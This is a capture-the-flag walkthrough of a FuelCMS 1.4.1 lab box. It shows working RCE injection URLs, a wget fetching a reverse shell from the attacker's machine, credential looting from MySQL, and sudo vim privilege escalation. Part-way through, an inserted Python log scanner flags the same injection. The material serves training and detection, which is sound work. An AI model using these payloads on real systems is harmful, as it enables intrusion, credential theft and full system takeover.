We always start with an nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-09 12:33 EDT
Nmap scan report for 10.10.176.69
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1c:59:d1:07:ea:d8:d2:0d:9a:1a:95:0c:74:f2:e6:d0 (RSA)
| 256 cd:a8:fc:b3:5c:0e:3e:12:76:80:d3:60:cb:1f:88:50 (ECDSA)
|_ 256 91:57:e4:6e:1d:4e:48:ec:3a:1c:a3:c7:89:40:4b:64 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Fuel CTF
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.27 seconds
Shit, here we go again lol. So we have two open ports, SSH (22) and HTTP (80). OK, heading to port 80 to see what is running.
FuelCMS, cool, and we have the version too: 1.4.1. OK, let's look around the blog some more. I also found some credentials, but no luck with them.
Since we know the FuelCMS version, let's check if it is vulnerable.
Ahhhh yeah, a Remote Code Execution exploit. Looks cool, let's give it a try. I love doing things manually. Why is that? Because we learn more from doing things manually; that is the best way to learn.
Going through the exploit, I found the vulnerable page, which allows us to run system commands with a little tweaking.
http://10.10.176.69/fuelcms/index.php/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('uname -a')%2B'
Cool, our command works. Now it's time to get a reverse shell back to our terminal.
- we need to host the reverse shell with SimpleHTTPServer on our attacking machine
- we need to use wget to get it onto the victim machine
Now let's wget it.
http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('wget local-ip:8000/rev.php')%2B'
Now let's start our ncat listener on the port we put in the reverse shell file.
First let's confirm that our file was uploaded to the target, then access the reverse shell file to get our shell back.
http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('ls -la')%2B'
Now let's get a shell.
http://10.10.176.69/fuelcms/rev.php
Boom, we have a shell. Let's also spawn a TTY shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
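As an added defender-side example (not from the original post), here is a small Python scanner that walks Apache access log lines for the two artifacts this walkthrough leaves behind: PHP code injected into the FuelCMS pages/select filter parameter, and a request to a stray PHP file dropped in the web root. The log lines, timestamps and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not from the original post).
# The first two mirror the injected "filter" parameter shown in the walkthrough,
# the third is the fetch of the dropped web shell, the fourth is a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2021:12:40:01 -0400] "GET /fuelcms/index.php/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('uname+-a')%2B' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2021:12:41:10 -0400] "GET /fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('wget+10.0.0.5:8000/rev.php')%2B' HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2021:12:42:30 -0400] "GET /fuelcms/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [09/May/2021:12:43:00 -0400] "GET /fuelcms/index.php/fuel/pages/select/?filter=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP constructs that have no business in a page filter value: a call through a
# variable ($a(...)) or a direct call to a command-execution function.
INJECT_RE = re.compile(r"\$\w+\s*\(|\b(system|exec|passthru|shell_exec|popen)\s*\(", re.I)

def decode_filter(path):
    """Return the URL-decoded 'filter' query value of a request path, or None if absent."""
    vals = parse_qs(urlsplit(path).query, keep_blank_values=True).get("filter")
    return vals[0] if vals else None

def scan_access_log(text):
    """Return a list of (ip, timestamp, reason, evidence) tuples for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if "/fuel/pages/select" in path:
            f = decode_filter(path)
            if f and INJECT_RE.search(f):
                findings.append((m.group("ip"), m.group("ts"), "code injection in filter", f))
        elif re.search(r"/fuelcms/[^/?]+\.php$", path) and not path.startswith("/fuelcms/index.php"):
            findings.append((m.group("ip"), m.group("ts"), "request to non-standard php file", path))
    return findings

if __name__ == "__main__":
    for ip, ts, reason, evidence in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {reason}: {evidence}")
```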
Privilege Escalation
Going to the users' directory, there is only one user, and we have no access to it.
Going through the FuelCMS folder, I found the database config file with the MySQL login details.
/var/www/html/fuelcms/fuel/application/config/database.php
Typing mysql, and I was in.
show databases;
use fuelcmsdb;
show tables;
Now let's read the fuel_users table.
SELECT * FROM fuel_users;
Boom, we have john's password in base64. Now let's decode it.
Decoded. Since we have the password now, and port 22 (SSH) is open, let's log in with it.
And we are in. Now let's check sudo.
Seems we can run vim with sudo to get root; let's check GTFOBins.
sudo vim -c ':!/bin/sh'
And we are root.
Greetings from Muzec